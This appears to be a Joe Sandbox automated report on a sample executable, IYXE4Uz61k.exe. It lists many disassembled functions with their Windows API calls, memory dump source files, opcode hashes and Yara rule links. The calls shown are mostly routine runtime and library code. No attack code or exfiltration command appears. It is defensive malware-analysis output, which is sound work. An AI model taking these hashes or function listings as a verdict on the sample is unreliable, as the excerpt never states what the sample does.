                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00897E24,?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002), ref: 00897E93
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00897EA6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00897E24,?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897EC9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                    • Opcode ID: c1e5c766662dc2baa045cad98ea4c6da33b33396e075e65b9870b0e4a78acc11
                                                                                                                                                                                                    • Instruction ID: b93f6c274c61d221ad11a663609180036bc50cec982b50e8357e18599b0b6e4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1e5c766662dc2baa045cad98ea4c6da33b33396e075e65b9870b0e4a78acc11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F06231A14208BBEF11AFA4DC09B9EBFB5FF45711F0840A9F805E2660DB349E40CB94
                                                                                                                                                                                                    Function 0087F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                      • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087F2E4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(008B81C8,CryptUnprotectMemory), ref: 0087F2F4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                                                                                                    • Opcode ID: f89e2818669ccf1ca7152a05a4300cf171bcf102c1e054470601b33f63c591bd
                                                                                                                                                                                                    • Instruction ID: 4cb06500e4a21b57d875cff26da6ce85aa2fcedbfdf5b03e77d0a76d5bf2b0b3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f89e2818669ccf1ca7152a05a4300cf171bcf102c1e054470601b33f63c591bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03E08670910F219EE7209FB9984DB01BAD4FF06710F14C82DF0EAD3B45D6B8E5808B50
                                                                                                                                                                                                    Function 00892BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2252061734-0
                                                                                                                                                                                                    • Opcode ID: c889be747ac3f63b08bf5d4d0c31d22b89293e2fd5ff83ae0d67ca508541e29a
                                                                                                                                                                                                    • Instruction ID: 7ff5c7abd3c3d096051882bb0f7dbc10a252bb209e767e30a61b66b822c68145
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c889be747ac3f63b08bf5d4d0c31d22b89293e2fd5ff83ae0d67ca508541e29a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D951E17160021ABFDF29AF58D845BAA73A4FF14318F2C412DE802C76A2D731ED40DB91
                                                                                                                                                                                                    Function 0089BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0089BF39
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089BF5C
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089BF82
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089BF95
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089BFA4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                    • Opcode ID: 516b700aae86749f3bf9e757169df407e289ce1b4108a8a7fd594aa9b6c1f00b
                                                                                                                                                                                                    • Instruction ID: 015ad748e3ba2f1fe9fdc4c06a633fddf79a06ccddd621586cbaf230917b21eb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 516b700aae86749f3bf9e757169df407e289ce1b4108a8a7fd594aa9b6c1f00b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3018F726056157F2B213ABA6D8DC7BBA6DFEC3BA13180129F904C2241EF608D0295B1
                                                                                                                                                                                                    Function 00899869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,008991AD,0089B188,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089986E
                                                                                                                                                                                                    • _free.LIBCMT ref: 008998A3
                                                                                                                                                                                                    • _free.LIBCMT ref: 008998CA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 008998D7
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 008998E0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                    • Opcode ID: aa7e2e89bf15f1753f9b8d05e93c31cb237e27acecf615e96cd49abc9de71130
                                                                                                                                                                                                    • Instruction ID: ac50d7fcc32127d66922d550eb24ec832cbebcc2d2044e94d247831f2ed2c6cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7e2e89bf15f1753f9b8d05e93c31cb237e27acecf615e96cd49abc9de71130
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4014436100A056BEE12332D6C8592B262DFBE337072C013CF851F2A92EE248C014162
                                                                                                                                                                                                    Function 00880EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 008811CF: ResetEvent.KERNEL32(?), ref: 008811E1
                                                                                                                                                                                                      • Part of subcall function 008811CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008811F5
                                                                                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00880F21
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00880F3B
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00880F54
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00880F60
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00880F6C
                                                                                                                                                                                                      • Part of subcall function 00880FE4: WaitForSingleObject.KERNEL32(?,000000FF,00881101,?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FEA
                                                                                                                                                                                                      • Part of subcall function 00880FE4: GetLastError.KERNEL32(?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FF6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1868215902-0
                                                                                                                                                                                                    • Opcode ID: ea8edce4835b80905abb5cab0be94a34bc66d319e2e38fde951ffdfcb451b6b8
                                                                                                                                                                                                    • Instruction ID: 9d6a2790aafe123a9fde2999dc7c500a0a74bfeb42948d45e56680625ad5f8cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea8edce4835b80905abb5cab0be94a34bc66d319e2e38fde951ffdfcb451b6b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B017172100B44EFD732AB68DD89BC6FBA9FB09710F004929F26B925A0CB757A45CB54
                                                                                                                                                                                                    Function 0089C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C817
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C829
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C83B
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C84D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C85F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 40d46691be35ea11128a70dc0260335ac597d263309dbca8b99a8f1fa9d75317
                                                                                                                                                                                                    • Instruction ID: 9dd3b07a4f10d4c2c1b61aed6e237fd0808ca913fcee619ba0e8d77c97cf9eef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40d46691be35ea11128a70dc0260335ac597d263309dbca8b99a8f1fa9d75317
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F01D32504201EBDE20FB68E9C6C1A73E9FA0675576C1C29F148E7952CB71FC80CA65
                                                                                                                                                                                                    Function 00881FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00881FE5
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00881FF6
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00882006
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00882014
                                                                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0087B371,?,?,00000000,?,?,?), ref: 0088202F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3397213944-0
                                                                                                                                                                                                    • Opcode ID: 22e7ef9e83dd21774ce66454b3a94566a2fbf509f21daf75b2774cc6bceebcaf
                                                                                                                                                                                                    • Instruction ID: 204dc68727fef158f77c81d4881c3aad7c3b96a71b826acae879d70fb00b54af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22e7ef9e83dd21774ce66454b3a94566a2fbf509f21daf75b2774cc6bceebcaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF06732108018BBCF236F95EC09D8E3F26FB40770B258005FA1A9A461CB7296A1DB90
                                                                                                                                                                                                    Function 00898900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089891E
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898930
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898943
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898954
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898965
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 4bc1aaae6ec0b062ec9f49b995cca5722bc35001d38cc3de21a8c3fd76aa989e
                                                                                                                                                                                                    • Instruction ID: 6ccffb76554120ac35c96bfeab7a4a4662a0cded5191b31a6f7ac1450574a5d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc1aaae6ec0b062ec9f49b995cca5722bc35001d38cc3de21a8c3fd76aa989e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4F0DA71816623DB9A467F58FC12415BFA1FB3A7643090B07F514D72B1CB3189519B82
                                                                                                                                                                                                    Function 008815FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _swprintf
                                                                                                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                                                                                                    • Opcode ID: 3c216e0689095b6248536647480c6438364be3986538a791f4bf7c0f272dcbea
                                                                                                                                                                                                    • Instruction ID: 854610dd2437f342af44552e4fd701bb81ad5e23631a96b90464ea714e1f8a56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c216e0689095b6248536647480c6438364be3986538a791f4bf7c0f272dcbea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A751E871284308F6EE1176948D4FF25725DFB25B08F14491AF3CBE44D5EEB2A812A71B
                                                                                                                                                                                                    Function 00897F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IYXE4Uz61k.exe,00000104), ref: 00897FAE
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898079
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898083
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                    • API String ID: 2506810119-3152104929
                                                                                                                                                                                                    • Opcode ID: 2cac499dcdb028d3a2fe4d906801af5f0cad0a7f372ec8044917263751039242
                                                                                                                                                                                                    • Instruction ID: 342502ad664d50b4cf2aa531740053bb7766a236f64b17c439ecd6abcdce26db
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cac499dcdb028d3a2fe4d906801af5f0cad0a7f372ec8044917263751039242
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F31AD71A04609EFDF21EF999C8199EBBA8FBA6310F18416AF404E7210DA718A44CB61
                                                                                                                                                                                                    Function 008931D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008931FB
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00893306
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
